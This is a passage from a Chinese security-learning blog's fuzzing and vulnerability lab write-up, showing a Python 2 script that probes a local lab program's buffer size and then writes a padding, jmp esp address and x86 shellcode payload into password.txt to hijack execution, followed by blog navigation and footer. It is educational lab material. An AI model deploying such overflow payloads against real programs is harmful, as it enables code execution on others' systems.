<li><p>构造<code>shellcode</code>,先输入<code>8200</code>个脏数据,构造<code>shellcode</code>后程序如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">rpwd = <span class="string">"Congratulation! You have passed the verification!\n"</span></span><br><span class="line">wpwd = <span class="string">"incorrect password!\n"</span></span><br><span class="line"></span><br><span class="line">i = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> i < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*i*<span class="number">100</span>)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> i+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行大约%d次后崩溃!"</span>%(i*<span class="number">4</span>*<span class="number">100</span>)</span><br><span class="line"></span><br><span class="line">j = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> j < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*(i-<span class="number">1</span>)*<span class="number">100</span>+<span class="string">"aaaa"</span>*j*<span class="number">10</span>)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> j+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行大约%d次后崩溃!"</span>%((i-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">100</span>+j*<span class="number">4</span>*<span class="number">10</span>)</span><br><span class="line"></span><br><span class="line">t = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> t < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*(i-<span class="number">1</span>)*<span class="number">100</span>+<span class="string">"aaaa"</span>*(j-<span class="number">1</span>)*<span class="number">10</span>+<span class="string">"a"</span>*t)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> t+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行%d次后崩溃!"</span>%((i-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">100</span>+(j-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">10</span>+t)</span><br><span class="line"></span><br><span class="line">jmp_esp = <span class="string">"\x8B\x94\xF8\x77"</span></span><br><span class="line">shellcode = <span class="string">"\x33\xDB\x53\x68\x31\x32\x33\x34\x68\x41\x42\x43\x44\x8B\xC4\x53\x50\x50\x53\xB8\x68\x3D\xE2\x77\xFF\xD0\x90\x90\x90\x90\x90\x90"</span></span><br><span class="line"></span><br><span class="line">fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line">fp.write(<span class="string">"aaaa"</span>*(i-<span class="number">1</span>)*<span class="number">100</span> + <span class="string">"aaaa"</span>*(j-<span class="number">1</span>)*<span class="number">10</span> + <span class="string">"a"</span>*t + <span class="string">"a"</span>*<span class="number">3</span> + jmp_esp + shellcode)</span><br><span class="line">fp.close()</span><br><span class="line">p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br></pre></td></tr></table></figure></li>
<li><p>运行<code>python</code>脚本,植入<code>shellcode</code>成功</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856219819.png" alt="1565856219819"></p>
</li>
<li><p>最终生成的<code>password.txt</code>文件如下</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856255135.png" alt="1565856255135"></p>
</li>
</ol>
</div>
<div>
<ul class="post-copyright">
<li class="post-copyright-author">
<strong>本文作者: </strong>李钰璕
</li>
<li class="post-copyright-link">
<strong>本文链接:</strong>
<a href="https://leeyuxun.github.io/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B8%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C.html" title="漏洞挖掘与模糊测试实验">https://leeyuxun.github.io/漏洞挖掘与模糊测试实验.html</a>
</li>
<li class="post-copyright-license">
<strong>版权声明: </strong>本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-cn" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处!
</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-tags">
<a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag"><i class="fa fa-tag"></i> 漏洞挖掘</a>
<a href="/tags/%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tag"></i> 模糊测试</a>
<a href="/tags/fuzz/" rel="tag"><i class="fa fa-tag"></i> fuzz</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/%E8%99%9A%E5%87%BD%E6%95%B0%E6%94%BB%E5%87%BB%E5%92%8CSEH%E6%94%BB%E5%87%BB%E5%AE%9E%E9%AA%8C.html" rel="prev" title="虚函数攻击和SEH攻击实验">
<i class="fa fa-chevron-left"></i> 虚函数攻击和SEH攻击实验
</a></div>
<div class="post-nav-item">
<a href="/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C.html" rel="next" title="SQL注入实验">
SQL注入实验 <i class="fa fa-chevron-right"></i>
</a></div>
</div>
</footer>
</article>
</div>
<script>
window.addEventListener('tabs:register', () => {
let { activeClass } = CONFIG.comments;
if (CONFIG.comments.storage) {
activeClass = localStorage.getItem('comments_active') || activeClass;
}
if (activeClass) {
let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
if (activeTab) {
activeTab.click();
}
}
});
if (CONFIG.comments.storage) {
window.addEventListener('tabs:click', event => {
if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
let commentClass = event.target.classList[1];
localStorage.setItem('comments_active', commentClass);
});
}
</script>
</div>
<div class="toggle sidebar-toggle">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
<aside class="sidebar">
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc">
文章目录
</li>
<li class="sidebar-nav-overview">
站点概览
</li>
</ul>
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%9B%AE%E7%9A%84"><span class="nav-number">1.</span> <span class="nav-text">实验目的</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="nav-number">2.</span> <span class="nav-text">实验环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%80%9A%E8%BF%87FtpFuzz%E6%9D%A5fuzz-easy-ftp-server%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E4%BD%BF%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%81%9C%E6%AD%A2%E5%B7%A5%E4%BD%9C"><span class="nav-number">3.</span> <span class="nav-text">通过FtpFuzz来fuzz easy ftp server的服务器,使服务器停止工作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BC%96%E5%86%99%E6%88%96%E4%BF%AE%E6%94%B9Python%E8%84%9A%E6%9C%AC%E6%9D%A5%E8%87%AA%E5%B7%B1%E7%BC%96%E5%86%99FTP-FUZZ%E7%AE%80%E5%8D%95%E5%B7%A5%E5%85%B7%EF%BC%8C%E5%B9%B6%E7%94%A8%E5%85%B6%E6%9D%A5%E5%AF%B9Home-Ftp-Server%E8%BF%9B%E8%A1%8CFuzz-%E4%BD%BF%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%81%9C%E6%AD%A2%E5%B7%A5%E4%BD%9C"><span class="nav-number">4.</span> <span class="nav-text">编写或修改Python脚本来自己编写FTP FUZZ简单工具,并用其来对Home Ftp Server进行Fuzz,使服务器停止工作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95%E7%BB%93%E8%AE%BA"><span class="nav-number">5.</span> <span class="nav-text">测试结论</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%9D%E8%80%83%E9%A2%98"><span class="nav-number">6.</span> <span class="nav-text">思考题</span></a></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" alt="李钰璕"
src="/images/avatar.png">
<p class="site-author-name" itemprop="name">李钰璕</p>
<div class="site-description" itemprop="description">安全学习笔记</div>
</div>
<div class="site-state-wrap motion-element">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">89</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">17</span>
<span class="site-state-item-name">分类</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">115</span>
<span class="site-state-item-name">标签</span></a>
</div>
</nav>
</div>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/Leeyuxun" title="GitHub → https://github.com/Leeyuxun" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i></a>
</span>
<span class="links-of-author-item">
<a href="mailto:leeyuxun@163.com" title="E-Mail → mailto:leeyuxun@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
</span>
</div>
</div>
<div class="back-to-top motion-element">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
</div>
</aside>
<div id="sidebar-dimmer"></div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<!--
<div class="copyright">
©
<span itemprop="copyrightYear">2023</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">李钰璕</span>
</div>
-->
<div class="busuanzi-count">
<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>
</div>
</footer>
</div>
<script src="/lib/anime.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
<script src="/lib/velocity/velocity.min.js"></script>
<script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script>
<script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>
<script src="/js/local-search.js"></script>
</body>
</html>